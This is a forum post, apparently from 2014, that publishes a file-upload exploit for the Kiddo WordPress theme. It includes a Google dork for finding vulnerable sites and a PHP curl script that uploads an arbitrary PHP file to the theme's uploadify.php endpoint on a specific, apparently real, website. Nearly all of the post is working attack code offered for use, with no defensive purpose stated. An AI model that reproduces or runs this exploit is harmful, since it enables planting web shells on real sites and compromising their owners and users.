W-P Admin
Posts : 80 Join date : 2013-11-12 Age : 38 Location : Cyber World
| Subject: Kidoo WP Theme File Upload Vulnerability Wed Apr 16, 2014 9:15 am | |
| [+] Author: TUNISIAN CYBER [+] Exploit Title: Kidoo WP Theme File Upload Vulnerability [+] Date: 05-02-2014 [+] Category: WebApp [+] Google Dork: - Code:
-
intext:"Powered by WordPress. Kiddo design by Antoni Botev & Evgeni Dimov" [+] Tested on: KaliLinux [+] Vendor: n/a [+] Friendly Sites: na3il.com,th3-creative.com Requirements: 1.) AppServ Download it [You must be registered and logged in to see this link.]2.) 3xp.php exploit (copy the code below and save it as 3xp.php) - Code:
-
<?php echo "=============================================== \n"; echo " Kiddo WP Theme File Upload Vulnerability\n"; echo " TUNISIAN CYBER \n"; echo "=============================================== \n
\n"; $uploadfile="jp.php"; $ch = curl_init("http://brightstartlearningcenter.com/wp-
content/themes/kiddo/app/assets/js/uploadify/uploadify.php
"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@
$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> | |
|